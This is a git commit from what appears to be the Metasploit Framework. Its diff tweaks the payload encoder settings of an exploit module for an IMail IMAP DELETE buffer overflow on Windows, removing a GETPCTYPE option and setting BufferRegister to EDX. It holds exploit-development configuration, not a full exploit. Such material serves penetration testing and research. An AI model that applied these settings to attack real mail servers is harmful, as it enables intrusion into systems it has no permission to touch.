Bug fix from nico

git-svn-id: file:///home/svn/framework3/trunk@3744 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2006-07-18 01:09:42 +00:00
parent 51c382f792
commit 167f787fcf
1 changed files with 4 additions and 2 deletions

View File

@ -29,7 +29,6 @@ class Exploits::Windows::Imap::IMailIMAPDeleteOverflow < Msf::Exploit::Remote
'Privileged' => true,
'DefaultOptions' =>
{
'GETPCTYPE' => 'edx',
'EXITFUNC' => 'thread',
},
'Payload' =>
@ -37,7 +36,10 @@ class Exploits::Windows::Imap::IMailIMAPDeleteOverflow < Msf::Exploit::Remote
'Space' => 614,
'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
'StackAdjustment' => -3500,
'EncoderOptions' =>
{
'BufferRegister' => 'EDX',
}
},
'Platform' => 'win',
'Targets' =>